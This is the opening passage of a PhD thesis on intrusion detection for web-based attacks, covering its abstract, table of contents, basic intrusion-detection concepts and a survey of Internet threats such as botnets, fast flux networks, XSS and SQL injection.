Detection of Web-Based Attacks

PhD in Electronic and Computer Engineering
Department of Electrical and Electronic Engineering

University of Cagliari, Italy
Detection of Web-based Attacks
Dott. Ing. Igino Corona
Advisor: Prof. Ing. Giorgio Giacinto
XXII Cycle
March 2009
Abstract
Computer Security is all about the weakest point in the information processing
chain. Nowadays, the Internet is the principal vector for the information processing
and exchange, and the web-based architecture represents the de-facto standard for
accessing Internet services. Web users (browsers) and server-side web applications,
are typically the weakest points in the information processing realized through the
Internet. In this thesis we present two research works, namely Flux Buster and
Web Guardian. We will show that these systems may signicantly contribute to the
security of web browsers and web servers (and applications), i.e. the typical weak
points. Thus, our research works may improve computer security on the Internet.
Moreover, we will critically review the general role of intrusion detection. In-
trusion Detection Systems (IDS) must learn and operate in an adversarial, hostile,
environment. As soon as an IDS is deployed, it becomes a component of the pro-
tected system/network. This aspect is worth to note, because as well as any other
component, the IDS itself may be attacked. Unfortunately, such a problem is really
complex and the overall picture is still unclear. Contrary, the awareness of this
threat is a necessary condition to improve current (and future) IDS solutions. We
will critically study the ways a skilled attacker may follow to attack an IDS, in each
component of its design. Then we will review and propose possible solutions to ad-
dress these issues. We will nally give to the reader a reference scheme to support
the design of adversary-aware IDS solutions.
We will highlight that the architecture of Flux Buster and Web Guardian reects
many key points of adversary-aware IDS solutions. In particular our general analysis
will be used to better understand the possible limitations of these systems and
identify possible ways of improvement.
Have a nice reading,

Igino Corona
Cagliari, March 2010

Acknowledgments
First and foremost, I would like to thank my advisor, Prof. Giorgio Giacinto, for
his precious guidance and timely advices. He is wonderful person, a great scientist.
Thanks to Prof. Fabio Roli, the lead of our PRA group, for sharing his experience,
expertise and life's vision to improving the quality of my research. Thanks to Davide
Ariu and Roberto Perdisci, with whom I had the pleasure to work on important
projects presented in this thesis. A special thank goes to Roberto who helped me
during my period of stay in Atlanta.
Thanks to Prof. Wenke Lee for giving me the chance to work with his amazing
research group at Georgia Institute of Technology. Thanks to all GeorgiaTech's
guys (great researchers!) with whom I had the honor to share ideas about life and
research. In particular, I'd like to thank Xiapu Luo, Junjie Zhang, Kapil Singh,
Andrea Lanzi, Martim Carbone, Monirul Sharif and Abinhav Srivastava.
Special thanks to my family, my girlfriend, and her family, for their love and
support. Without them, this accomplishment would not have been possible. Thanks
to my bandmates and close friends, Mauriz, Mauretto, Andrea. Without them and
without music I would be lost.
Finally, I'd like to thank all members of the PRA Group. I am honored to be
part of this group. It is like a big family: We few, we happy few, we band of
brothers.
Dedicata a Marylù
Contents
1 Introduction 1
1.1 Computer Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
1.2 Security assurance process . . . . . . . . . . . . . . . . . . . . . . . . 2
1.3 Intrusion Detection Systems . . . . . . . . . . . . . . . . . . . . . . . 4
1.3.1 Intrusion Detection as a Pattern Recognition Task . . . . . . 7
2 Previous, Current and Future Internet Threats 9

2.1 Common Vulnerabilities . . . . . . . . . . . . . . . . . . . . . . . . . 10
2.2 Know your enemy . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11
2.3 Web security is a major concern . . . . . . . . . . . . . . . . . . . . . 12
2.3.1 Client-side web security . . . . . . . . . . . . . . . . . . . . . 13
2.3.2 Server-side web security . . . . . . . . . . . . . . . . . . . . . 15
2.4 Adversarial Environment . . . . . . . . . . . . . . . . . . . . . . . . . 15
2.5 Research contributions of this thesis . . . . . . . . . . . . . . . . . . 17
3 Protecting web users 21

3.1 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
3.1.1 Content Delivery Networks . . . . . . . . . . . . . . . . . . . 21
3.1.2 Malicious fast ux service networks . . . . . . . . . . . . . . . 22
3.1.3 Detecting Fast Flux Service Networks . . . . . . . . . . . . . 26
3.2 Flux Buster . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 29
3.2.1 Trac Volume Reduction (F1) . . . . . . . . . . . . . . . . . 31
3.2.2 Periodic List Pruning (F2) . . . . . . . . . . . . . . . . . . . . 32
3.2.3 Further Domain Filtering (F3, optional) . . . . . . . . . . . . 32
3.2.4 Domain Clustering . . . . . . . . . . . . . . . . . . . . . . . . 33
3.2.5 Service Classier . . . . . . . . . . . . . . . . . . . . . . . . . 36
3.3 Experiments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 38
3.3.1 Collecting Recursive DNS Trac . . . . . . . . . . . . . . . . 38
3.3.2 Clustering Candidate Flux Domains . . . . . . . . . . . . . . 39
3.3.3 Evaluation of the Service Classier . . . . . . . . . . . . . . . 40
3.4 Applications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43
3.4.1 Safe browsing . . . . . . . . . . . . . . . . . . . . . . . . . . . 43
3.4.2 Spam Filtering . . . . . . . . . . . . . . . . . . . . . . . . . . 46
3.4.3 Limitations, possible solutions and future work . . . . . . . . 47
4 Protecting Web Services 57

4.1 Threat model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 58
4.2 Detecting attacks against web services . . . . . . . . . . . . . . . . . 60
4.3 HMM-Web . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 64
4.3.1 Feature extraction . . . . . . . . . . . . . . . . . . . . . . . . 65
vi Contents
4.3.2 Application-specic modules . . . . . . . . . . . . . . . . . . . 66

4.3.3 Decision module . . . . . . . . . . . . . . . . . . . . . . . . . 66
4.3.4 HMM building . . . . . . . . . . . . . . . . . . . . . . . . . . 67
4.3.5 Fusion of HMM outputs . . . . . . . . . . . . . . . . . . . . . 68
4.3.6 Experiments . . . . . . . . . . . . . . . . . . . . . . . . . . . . 68
4.3.7 Results . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70
4.4 Web Guardian . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71
4.4.1 General learning framework . . . . . . . . . . . . . . . . . . . 71
4.4.2 General models . . . . . . . . . . . . . . . . . . . . . . . . . . 74
4.4.3 Modeled Web Trac Features . . . . . . . . . . . . . . . . . . 77
4.4.4 Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . 80
4.4.5 Experiments . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81
4.5 Limitations, proposed solutions and future work . . . . . . . . . . . . 85
5 Intrusion Detection and Adversarial Environment 93

5.1 Data Acquisition . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 94
5.1.1 Network Data Acquisition . . . . . . . . . . . . . . . . . . . . 95
5.1.2 Host Data acquisition . . . . . . . . . . . . . . . . . . . . . . 100
5.1.3 Adversarial environment against HIDS: Problems . . . . . . . 100
5.1.4 Adversarial environment against HIDS: Solutions . . . . . . . 101
5.2 Data pre-processing . . . . . . . . . . . . . . . . . . . . . . . . . . . . 103
5.2.1 Adversarial environment against data pre-processing: Problems104
5.2.2 Adversarial environment against data preprocessing: Solutions 104
5.3 Feature selection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 107
5.3.1 Adversarial environment against Feature Selection: Problems 107
5.3.2 Adversarial environment against Feature Selection: Solutions 108
5.4 Model Selection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 109
5.4.1 Adversarial environment against Model Selection: Problems . 109
5.4.2 Adversarial environment against Model Selection: Solutions . 111
5.5 Classication and result analysis . . . . . . . . . . . . . . . . . . . . 112
5.5.1 Problem overview . . . . . . . . . . . . . . . . . . . . . . . . . 113
5.5.2 Misuse-based classication and result analysis . . . . . . . . . 116
5.5.3 Anomaly-based classication and result analysis . . . . . . . . 122
5.5.4 Classication and result analysis: The alert verication solution126
5.5.5 Classication and result analysis: solutions based on Multiple
Classier Systems . . . . . . . . . . . . . . . . . . . . . . . . . 127
5.6 Storage box . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 129
5.7 Countermeasure box . . . . . . . . . . . . . . . . . . . . . . . . . . . 129
5.8 Discussion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 130
5.9 Conclusions and future work . . . . . . . . . . . . . . . . . . . . . . . 134
6 Concluding remarks 137
Bibliography 141
Chapter 1
Introduction
Figure 1.1: The so-called pyramid of Maslow, showing the more basic human needs
at the bottom. The safety (security) is clearly one of the most important needs.
Source: Wikipedia.
The need for safety [Maslow (1943)] is widely recognized among the more basic
human needs (see Fig. 1.1). Computer security (safety) is among the basic needs for
today's Internet users and on-line organizations, as well. In this thesis we present
our research work, which aims at satisfying this need. This work has been performed
during a three-years period of time and it is mainly related to two main problems
of computer security: (1) detection of security violations and (2) counteraction.
This chapter is dedicated to introduce the reader to some basic concepts that we
will use as reference throughout the thesis. Here we will dene (a) the concept of
computer security, (b) the security assurance process, (c) the formulation of intrusion
detection. Then, in Chapter 2 we discuss about current critical aspects of today's
Internet security. In that Chapter we motivate and outline our research work.
2 Chapter 1. Introduction
1.1 Computer Security

Computer security (or Information security) may be dened as the quantitative
evaluation of several, predened, properties of information. The National Institute
of Standards and Technology (NIST) [NIST FIPS199 (2004)] recognizes three key
qualities:
condentiality information access and disclosure are subject to authorized restric-

tions; personal privacy and proprietary information are protected;
integrity information modication or destruction is subject to authorized restric-

tions; information is accepted by the destination (non-repudiation); informa-
tion originates from the declared -or expected- source (authenticity);
availability information can be timely and reliably accessed and used.
Hence, the information processing and exchange must comply with some speci-
cations, namely security policies. Computer security reects how much such policies
may be guaranteed by information systems.
An intrusion (i.e. attack), is the violation of one or more security policies (secu-
rity violation), due to a security vulnerability. Malicious activity may identify either
an intrusion or an intrusion attempt.
1.2 Security assurance process

Information systems should process and exchange information in agreement with
security policies. To this end, a security assurance process must take place. It
should take place during the whole lifecycle of information systems. In general, the
security assurance process may be decomposed in three main mechanisms:
Prevention Prevention mechanisms aim at keeping security violations from hap-

pening, applying suitable constraints to design, implementation, usage and
management of information systems.
Detection Detection mechanisms aim at identifying security violations, or attack

attempts. Such events are also called alerts.
Counteraction Once a security violation (or an attack attempt) is detected, a

counteraction may take place. A counteraction aims at blocking the attacker,
and possibly limiting or remediating to the damages caused by the attack.
Prevention pregures the employment of the best practices for software and
hardware engineering, in agreement with security policies. Unfortunately, informa-
tion systems are becoming more and more complex. Moreover, the typical goal is
to reduce as much as possible the time to market. These two conditions explain
why the development task is inherently error-prone [Perks (2006)]. Furthermore,
1.2. Security assurance process 3
Figure 1.2: The security assurance process can be viewed as a control system
it is common that functional constraints and security policies are not in agree-
ment. So, a tradeo between functional constraints and security policies must
be attained [Ben-Asher (2009)]. Of course, prevention of security violations on
information systems is deeply inuenced by humans who manage and use them.
On the other hand, information systems are only (and should be considered as),
instruments of human beings [Asimov (1956)]. As pointed out by Kevin Mitnick,
one of the world's most famous Hackers exploiting human vulnerabilities:
One cannot buy an expensive box and assume all problems are solved. It all
comes down to worker training and constant, diligent eorts on the part of all
workers in a company to achieve a reasonable level of information security.
Weak authentication, inadequate conguration of systems, poor assumptions

regarding users' behavior, failure to guarantee systems up to date, ignorance and
the tendency to trust in other people are some examples of typical sources of vul-
nerabilities introduced by humans [Lam et al. (2004)]. Summing up, prevention is
necessary, but it may not be sucient to guarantee that information is actually
processed in agreement with security policies.
In gure 1.2 we describe the security assurance process as a control sys-

tem [Raven (1995)]. Using such an analogy, prevention may be mainly viewed as an
open-loop mechanism. That is, prevention is mainly a static mechanism which is
embedded in the information system itself. On the other hand, intrusion detection
allows for a dynamic analysis of information systems. Intrusion detection sensors
measure information system events, in real time. Then, the main goal of intrusion
detection is to detect events which identify a violation of security policies (or an
attempt to). Of course, the detection of security violations or attack attempts is
not a trivial task. From the point of view of a system administrator, attacks are
substantially unpredictable and security vulnerabilities are unknown. However, as
we will discuss in Section 1.3, intrusion detection may be approached as a pattern
recognition task. There are so many, well-known pattern recognition techniques in
literature, and they may be applied to the detection of security violations. This is
Figure 1.3: Key IDS components, according to the Common Intrusion Detection
Framework [CIDF].
the main reason why intrusion detection is currently an active research eld (and
the object of this thesis).
Even a perfect detection mechanism is useless without a counteraction.

Counteractions are analogous to signals generated by a controller in a control
system (see g. 1.2). It is worth noting that counteractions should be auto-
mated [Hedberg, S. (1996)] [Harmer et al. (2002)], in order to react to attacks at
computer speed. However, they typically need the support of a human operator
(i.e. security administrator) also. This because it may be too complex to provide
for fully automated counteractions, especially in high critical environments. Coun-
teractions may have pros and cons that should be correctly evaluated before acting.
Counteractions may pregure also the identication of the attacker, e.g., by means
of forensics science [Casey (2004)], or even a counterattack as made by FBI against
two Russian attackers [Lemos (2001)]. In a sense, legal proceedings against the
attacker may be considered as counteractions, as well.
1.3 Intrusion Detection Systems

Intrusion Detection Systems (IDS) aim at identifying security violations, or attack
attempts. Then, in response to such events, they may provide for some automatic
counteraction. Furthermore, the IDS task is to allow the security administrator to
gain detailed information about malicious (or suspect) activity. This information
supports the security administrator performing counteractions that cannot be au-
tomated. Thus, IDS represent a fundamental component of the security assurance
process (see Section 1.2).
Architecture According to the Common Intrusion Detection Framework (CIDF)

[CIDF] (see g. 1.3), the general IDS architecture is made up of four components:
1.3. Intrusion Detection Systems 5
• event box that catches and represents events occurring on the information
system in a predened way; for example, it may catch packets owing in
a network node: for each packet, it may produce a variable (packet event)
containing all packet elds.
• analysis box that analyzes low level events (e.g. packet events), looking for
evidences of security violations, or attack attempts; for example, it may raise
an alert if current packet events match against (packet events identifying)
known attacks.
• countermeasure box that performs suitable actions to protect the informa-

tion system. As an example, it may close all network connections associated
to packets that have raised one or more alarms.
• storage box that stores events, alerts and countermeasures;
It is worth noting that most commercial IDS products are called In-
trusion Prevention Systems (e.g. [Cisco IPS] [TippingPoint IPS] [IBM ISS IPS]
[Sourcere IPS]). This term is more appealing, but such products t exactly in
the CIDF denition of IDS.
Classes IDS are usually subdivided into dierent classes, depending either on the
input data or the detection method:
Input data (event box)
• Network-based Input data is made up of network events, collected from

one or more network node(s). In packet switched networks, like the In-
ternet, input data is made up of packets.
• Host-based Input data is made up of host events, collected from one

or more computers (i.e. hosts). Host events typically reect the state of
operating system kernel and/or user applications running on the host.
Detection method (analysis box)
• Misuse-based (or signature-based) An alert is raised if current events

identify activity known to be malicious (i.e. attacks or attack attempts).
Malicious activity is usually described through a set of event patterns
(signatures).
• Anomaly-based A model of the normal (legitimate) activity is dened.

An alert is raised if current events identify anomalous activity, i.e. activ-
ity which deviates from the model of normal activity.
Each one of such classes has complementary pros and cons. This is the reason
why modern IDS solutions may t in more than one class: they may collect both
network and host events, and employ a mixture of the two detection methods.
Thus, an advanced knowledge of pros and cons of each one of the above classes is
of paramount relevance for developing any IDS solution. We will discuss more in
detail about it in Chapter 5.
Properties Intrusion Detection Systems may be characterized by many dierent

properties, depending upon their specic task. Nevertheless, we recognize some key
properties:
accuracy how well the IDS is able to distinguish between malicious and legitimate
activities.
learning time amount of time necessary to automatically build/adapt detection

models (i.e. signatures and/or normal activity).
throughput amount of events per unit of time that the IDS is able to analyze.
responsiveness how quickly the IDS respond to attacks by performing counterac-

tions (or simply by signaling alerts to a human operator).
computational and memory requirements resources required by the IDS dur-

ing its functioning.
The accuracy may be considered as the most important property of an IDS.

On the other hand, it is very dicult to evaluate, and typically only a statistical
estimation can be given. Such a property is usually expressed in terms of detection
rate (fraction of detected malicious activities) and false alarm rate (fraction of
legitimate activities erroneously classied as malicious). Detection and false alarm
rates are evaluated over a (statistically) representative test set containing events
associated to both legitimate and malicious activities.
However, the other properties are very important as well, and they may inu-
ence the actual accuracy (and eectiveness) of the IDS. The IDS environment is
prominently time-variant: information systems are constantly in evolution and new
attack instances are developed on a daily basis. Thus, the IDS models should be
updated to face this evolution and guarantee the expected accuracy value during
the time. In other terms, a relatively low value of learning time is a must. Also,
an enough large value of throughput is necessary to be able to analyze all events
collected from information systems as soon as they are generated. Furthermore, a
very important IDS property is its responsiveness. This property may signicantly
aect the quality of any counteraction. It is easy to see that counteractions should
be performed at the same speed of attacks. If this is not possible, e.g. due to a rel-
atively low responsiveness, counteractions may not be eective against the detected
attacks. Finally, all previous properties depend upon the IDS implementation, and
its computational and memory requirements. In general, the better such properties
the higher these requirements. Thus, given a specic IDS' hardware and software
platform, a tradeo must be always attained.
1.3. Intrusion Detection Systems 7
1.3.1 Intrusion Detection as a Pattern Recognition Task

Intrusion detection can be approached as a pattern recognition task, where data
must be assigned to one out of two classes: malicious and legitimate activities.
Thus, the IDS design can be subdivided into the following steps:
1. Data acquisition. This step involves the choice of the data source, and
should be designed so that captured events allow distinguishing as much as
possible between malicious and legitimate activities.
2. Data preprocessing. Acquired data is processed so that patterns that do

not belong to any of the classes of interest are deleted (noise removal), and
incomplete patterns are discarded (enhancement).
3. Feature selection. This step aims at representing patterns in a feature space

where the highest discrimination between legitimate and malicious patterns is
attained. A feature represents a measurable characteristic of the information
system's events (e.g. number of unsuccessful logins).
4. Model selection. In this step, using a set of example patterns (training

set), a model achieving the best discrimination between legitimate and attack
patterns is selected.
5. Classication and result analysis. This step performs the intrusion detec-
tion task, matching each test pattern with one of the classes (i.e. malicious
or legitimate activity), according to the IDS model. In this step an alert is
produced, either if the analyzed pattern match the model of the attack class
(misuse-based IDS), or if an analyzed pattern does not match the model of
the legitimate activity class (anomaly-based IDS).
It is easy to see that the data acquisition step is associated with the event box
of the CIDF, while all other steps can be associated to the so-called analysis box of
the CIDF. The identication of above steps is useful for the development and the
evaluation of IDS. In particular, in Chapter 5 we will use such subdivision to study
IDS in the context of their adversarial environment.
Chapter 2
Previous, Current and Future
Internet Threats
If you know the enemy and know yourself you need not fear
the results of a hundred battles.
Sun Tzu
In the 1988, Robert T. Morris, a graduate student in Computer Science at Cor-

nell University (USA), implemented an experimental program called worm . This
1
program was able to replicate and to propagate itself through the Internet, by ex-
ploiting bugs on the UNIX sendmail program, the nger daemon fingerd and
performing a password guessing attack to execute Rsh/Rexec with user creden-
tials [Page (1988)]. According to the author, the main goal of such a program was
to count the number of vulnerable computers connected through the Internet. Un-
fortunately, as soon as the Morris Worm was injected on, and started to spread over
the Internet, it turned out a worm design aw. This aw caused -very quickly- the
crash of thousand of computers at many sites, including universities, military sites
and medical research sites [Kehoe (1992)].
The Morris Worm is perhaps the rst known relevant Internet-based threat:
it caused an accidental Denial Of Service (DoS). About three years later, on
August 6, 1991, Tim Berners-Lee presented the World Wide Web (WWW, or
simply web) project, by posting a short summary on the alt.hypertext news-
group [Berners-Lee (1991)]. This date is signicant as identies the beginning of the
web as a public service. Later, in 1994 an email message warning about a computer
virus named good times started to circulate among Internet users [Jones (1998)].
This message recommended to delete any email having good times as subject, to
avoid virus infections. Actually, this was a false alarm, since such a virus never
existed. However, the world wide diusion of this email message was itself a sign
of the possible impact of real email viruses. In fact, some years later (1999), the
Melissa virus -by means of email messages- infected thousand of computers world-
wide, with an estimated nancial cost of million dollars [Northcutt (1999)]. Since
1
The concept of worm was introduced for the rst time by researchers at Xerox Palo Alto
Research Center. This research was aimed to support distributed computing, network diagnosis,
and signaling [Shoch and Hupp (1982)].
10 Chapter 2. Previous, Current and Future Internet Threats
then, Internet has represented the key instrument for the diusion of viruses and
malicious software, i.e. malware, in general.
In the mean time, the widespread adoption of Common Gateway Interfaces

(whose specications now reached version 1.1 [CGI v.1.1 (2004)]) allowed the web
to host innovative services including online e-commerce, shopping, home banking,
search engines, webmail, news networks. However, these innovative web services
quickly faced with unexpected attacks. In 2000, Michael Calce, also known as
MaaBoy, launched one of the most popular DoS attacks against websites of high
prole companies such as Yahoo!, eBay, CNN and E-Trade [Johnson (2000)]. This
caused an estimated 1.3 billion US dollars in lost business. Similarly, in 2001,
web services of famous organizations like Microsoft, the New York Time, Bank of
America, Cingular and Citigroup were attacked by Adrian Lamo. He successfully
breached the security barriers of such companies and anonymously pointed them
at existing vulnerabilities [Poulsen, K. (2001)]. This example as well as all early
Internet-based threats are useful to identify the classical attacker stereotype: an
individual who is driven by reputation, fun and desire of knowledge. However,
this stereotype is today obsolete. Cyber attacks have become more criminal and
organized in recent years.
This chapter is dedicated to a brief inquiry into the nature of today's (and ex-
pected future) most signicant Internet threats and vulnerabilities. This study is
organized as follows. Section 2.1 outlines the most common and critical vulnerabili-
ties. A brief analysis of the current most threatening attackers is made in Section 2.2.
Sections 2.3 and 2.4 are dedicated to the analysis of the web security problem and
the adversarial environment in which security solutions must operate, respectively.
This analysis is useful to highlight our research contributions in Section 2.5.
2.1 Common Vulnerabilities

According to a recent report of the SANS Institute [SANS (2009)], the primary in-
fection vector on the Internet is due to vulnerabilities in client-side software. Such
vulnerabilities are routinely exploited by malicious websites. Browsers, and client-
side applications that can be invoked by browsers, constitute the most targeted
software. In some cases, client software may be compromised by only visiting
malicious websites: exploits may not require to download and open a document.
Furthermore, most of web attacks employ social engineering techniques to attract
their victims. They may even oer rogue security tools which actually represent
malware [Lau (2009)].
Miscreants employ the infected computers for a variety of purposes. First, com-
promised computers may attack other computers in the internal network (which are
normally not accessible from the Internet), or in the Internet, in order to propa-
gate the infection. Also, miscreants usually steal condential data from the infected
computers and install back doors in order to allow them to return for further ex-
ploitation. Such computers may become part of a botnet in order to serve as slaves
2.2. Know your enemy 11
for performing coordinated attacks against other computers [Lee et al. (2008)]. In
particular, computers in a botnet are increasingly employed to make up fast ux
service networks. These sophisticated networks usually host malicious webstites,
and remediating these websites is a really hard problem (see Section 3.1.2).
On the other hand, users may be attacked by well-known trusted websites

which have been previously infected. Often, websites, and in particular web applica-
tions, are attacked in order to inject client-side exploits. Website attacks account for
more than 60% of the total attack attempts observed on the Internet [SANS (2009)].
As evidenced by the Mitre corporation [CVE], the percentage of web-related

vulnerabilities is still increasing over time. Furthermore, there has been a signi-
cant increase over the past three years in the number of people discovering zero-day,
i.e. never-before-seen, vulnerabilities [SANS (2009)]. This activity is so important
that zero-day vulnerabilities, as well as programs exploiting such vulnerabilities
are constantly bought and sold by public companies and underground organiza-
tions [Miller (2007)].
In general, the higher the software abstraction level, the higher is the related
number of vulnerabilities (see g. 2.1). Also, most of the attacks involve software
applications, because their patching is much slower than operating system patch-
ing [SANS (2009)].
Figure 2.1: The higher the software abstraction level, the higher the number of
vulnerabilities (source [SANS (2009)]).
2.2 Know your enemy

Nowadays, the largest Internet threat is posed by criminal organizations or nation-
states seeking economic, military and/or political advantage. Thus, a substantial
part of today's cyber attacks is due to a rational high-level behavior. Even if the
new attack instances depend on future technologies, we expect that the key goals
will remain the same in years to come.
Wealthy underground markets are currently managed by criminal organizations.

In such markets miscreants may sell (or buy) illicit services, such as Phishing,
SPAM advertising, DoS attacks, exploitation tools, or condential/strategic
data, such as credit card numbers, on-line banking credentials, zero-day vulnerabil-
ities [Franklin et al. (2007)] [Symantec (2009)] [IBM (2009)].
Criminal organizations virtually own million of compromised computers (i.e.

botnets) world-wide and employ them to their advantage. For example, such a high
number of hosts may potentially perform a (distributed) DoS against any Internet
service [Mills (2009)]. Botnets may be employed to send billions of spam emails
per day [Ng (2009)]. A portion of a botnets may be used to build fast ux service
networks aimed at stealing condential information, installing malware and sup-
porting phishing (see Section 3.1.2). Computers in a botnet are very dicult to be
remediated, since their high number, dierent physical owner and diverse geolo-
cation. These machines are often scattered across many nations, and remediating
them would also require a coordinated international response eort.
In recent years multiple evidences of nation-states involvement in cyber attacks

have been collected. Internet may be used as a tool of war and the related threats
now are matter of national security. For example, in 2005, sophisticated attacks
against computer networks of the US government have been strongly linked to
military hackers in China [FP (2005)]. Estonia accused Russia of involvement in
attacks against Estonian government, newspapers and banking websites. These at-
tacks started from decision of Estonia to move the Bronze Soldier, a Soviet World
War II memorial [Bright (2007)]. Nations-states may target also well-known com-
panies. Google said that the accounts of people (around the world) that advocates
for human rights in China are routinely accessed by third parties. According to
security experts from iDefense Labs, these attacks are probably supported by the
Chinese government [Shiels, M. (2010)].
2.3 Web security is a major concern

Figure 2.2 shows the main components of a modern web-based architecture. Such an
architecture follows the client-server paradigm, and data is exchanged according to
either HTTP [RFC 2616 (1999)] or HTTPS protocol [RFC 2818 (2000)]. The web
browser (client) sends a request message and the web server replies with a message
containing the requested informative content. All modern web services are based
on the so-called Common Gateway Interfaces (CGI). According to the CGI scheme,
informative content is generated in real-time by a web application. Web applications
are software programs which, depending on their input, may return some type of
informative content (e.g. an HTML page, a video or audio stream). Web application
inputs are extracted by the web server from the request message. This architecture
is robust, exible and allows an easy sharing of information content among Internet
users. This explains its wide deployment, but also why it is currently the main
target for cyber-criminals.
2.3. Web security is a major concern 13
Figure 2.2: The web-based architecture. (1) A request message is sent by the web
client (i.e. browser) to the server. (2) The web server interprets the message to select
a web application and its inputs. (3) Inputs are submitted to the web application.
(4) Depending on its inputs, the web application outputs some informative content.
(5) The web server replies with a response message to the web client; this message
contains the web application's output.
A recent report from Cenzic corporation shows that about 78% of the total
Internet-based threats are related to web-based vulnerabilities [Cenzic (2009)]. The
current trend highlights that this situation is going to be worse, since web vulner-
abilities are signicantly increasing over time. Thus, this is a current problem, but
it is expected to be a relevant problem in years to come.
According to the denition of the web-based architecture, we may subdivide the

web security problem in two main subproblems: client-side and server-side web se-
curity. In order to better understand the contribution of this thesis, in the following
we discuss more in detail about these two issues.
2.3.1 Client-side web security

A key problem of client-side web security is represented by the time gap between
the application aw disclosure and the deployment of a suitable countermeasure.
Once a program exploiting a software aw has been released into the wild, users
of the aected software will continue to be compromised until a suitable coun-
teraction is not taken. The typical countermeasure is the patching of client-side
applications, i.e. correcting these applications in order to remove the vulnerability.
Generally, the software developer builds a patch, then it is up to the user (admin-
istrator) of the aected software to download and install such a patch (or to allow
the automatic software update). Unfortunately, the patch development process may
take a relatively long time. Some vulnerabilities may wait years before getting a
patch [SANS (2009)].
Moreover, client-side web security is widely aected by the so-called browsers'

plug-ins, i.e. programs that can be invoked by the browser. These programs may
handle, interpret and/or display multimedia content which is not handled natively by
the web browser. Some examples of popular (and today's most targeted) browser
Adobe Flash Player, Adobe Reader, Sun Java, Microsoft Office
plug-ins are
suite (Excel, Powerpoint, Word). A malicious (or infected) website may easily
compromise million of computers world-wide by exploiting a bug in one of these
applications. Figure 2.3 shows the distribution of vulnerabilities on client-side soft-
ware. This picture reects the top 30 vulnerabilities exploited on client-side soft-
ware [SANS (2009)]. Remote code execution vulnerabilities are among the most
exploited by malicious websites.
Remote Code
Execution
50.0%
6.2%
9.4%
Other
Elevation of
9.4% Privileges
25.0%
Buffer Overflow
Multiple
Vulnerabilities
Figure 2.3: Top vulnerabilities exploited on client-side software.

2.4. Adversarial Environment 15
2.3.2 Server-side web security

Server-side web security is widely aected by vulnerabilities on web servers, and
in particular, web applications. Web applications are becoming even more com-
plex and considering all possible exceptions to the expected behavior is really hard.
Moreover, website developers (and administrators) demonstrate a lack of awareness
and security training to cope with attacks targeting the most common aws.
Web applications represent an interesting target for two main reasons. First
and foremost, web applications may handle condential data, such as user's ac-
count credentials, users' personal information or condential documents. Moreover,
a vulnerability may be exploited to perform unauthorized actions, such as unau-
thorized money transfers in a home banking website, or to stealthily attack other
computers, e.g. using the website as a proxy. Secondly, the web application may be
compromised to return malicious code (e.g. Javascript code) and attack users that
will further connect to the website. The latter type of attack is currently the most
diused [SANS (2009)].
The Web Application Security Consortium recently published a relevant report

on Web Application Security Statistics [WASC (2010)]. Such a report is related to
data collected in 2008 and analyzed more than 12,000 web applications, identifying
about 100,000 vulnerabilities. About 96% of web applications under such a study
contained high risk vulnerabilities, and more than 13% of all websites has been found
exploitable completely automatically. Moreover, 99% of web applications has been
found not compliant with the PCI Data Security Standard, a set of requirements
best practices for enhancing the security of payment account data, dened by the
PCI Security Standards Council [PCI].
These results, in addition to the public availability (i.e. exposition) of web

services, clearly highlight the problem relevance. Figure 2.4 shows the top web
application vulnerabilities according to the study [WASC (2010)]. Cross-Site script-
ing (XSS), information leakage and SQL injection aws are the most diused. In
particular, according the Open Web Application Security Project [OWASP (2010)],
injection aws such as XSS and SQL injection represent the top security risks.
Server-side attacks may target popular web sites, and in particular websites em-
ploying open-source Content Management Systems (CMS). There is a good reason
for this, because CMS are widely diused, and they may be easy to attack, since
their source code is publicly available and thus it may be easier to nd security bugs
through white box analysis (i.e. code inspection).
2.4 Adversarial Environment

Computer security is a research eld that must coexist with the presence of an
adversary. The adversary is motivated to break security policies and evade security
mechanisms, (possibly) with minimum eort. Thus, every security solution should
be designed to cope with an adversarial environment. This aspect is currently
receiving more attention by security researchers, since attack tools are becoming
Figure 2.4: Top web application vulnerabilities (source [WASC (2010)]).
even more sophisticated and easier to use, and security tools even less eective.
As an example, a new generation of malware, the so-called malware 2.0, has re-
cently started to thrive [Porras (2009)]. Malware 2.0 may employ sophisticated tech-
niques such as code metamorphism, cryptography, virtualization, in order to evade
detection [Ollmann (2009)]. Advanced malware production programs are available
in the wild. These programs automate the malware production process, providing a
wide range of options to defeat current detection methods. They may even provide
for hack-back routines designed to identify whether the malware is operating within
a virtual environment. In this case, the malware may change its behavior and try to
compromise the virtual machine. The automated production of malware may also
employ techniques similar to copyright protection for games and media digital rights
management (DRM). These methods may signicantly enhance the robustness and
stealthiness aganist automated detection systems and even the reverse engineering
performed by threat analysts. Finally, miscreants dedicate a signicant eort in
quality assurance practices for new malware. New malware is validated, and thus
deployed, only after an extensive evaluation using current anti-virus products and
specialized on-line detectors (e.g. www.virustotal.com) [Ollmann (2009)].
Similarly, a wide range of evasion techniques is employed by most popular
web application attacks such as cross-site scripting [Hansen (2009)] and sql injec-
tion [Mac Vittie (2007)]. Web application input validation routines may be easily
evaded combining one or more of these evasion methods.
This situation suggests (and we believe) that the design of future security tools
must necessarily embed an adversarial environment awareness, in order to cope
with current and future threats. We dedicate Chapter 5 to the study of this problem
2.5. Research contributions of this thesis 17
with regard to Intrusion Detection Systems.
2.5 Research contributions of this thesis

In Section 2.3.1 we evidenced as the primary source of infection of Internet users
is the world-wide web. Web browsers and their plug-ins may be compromised, and
users may be fooled, by malicious websites. Thus, a possible way to address this
problem is to recognize malicious (or suspect) websites, and then deny by default
their loading. To some extent, a similar approach is already implemented in popular
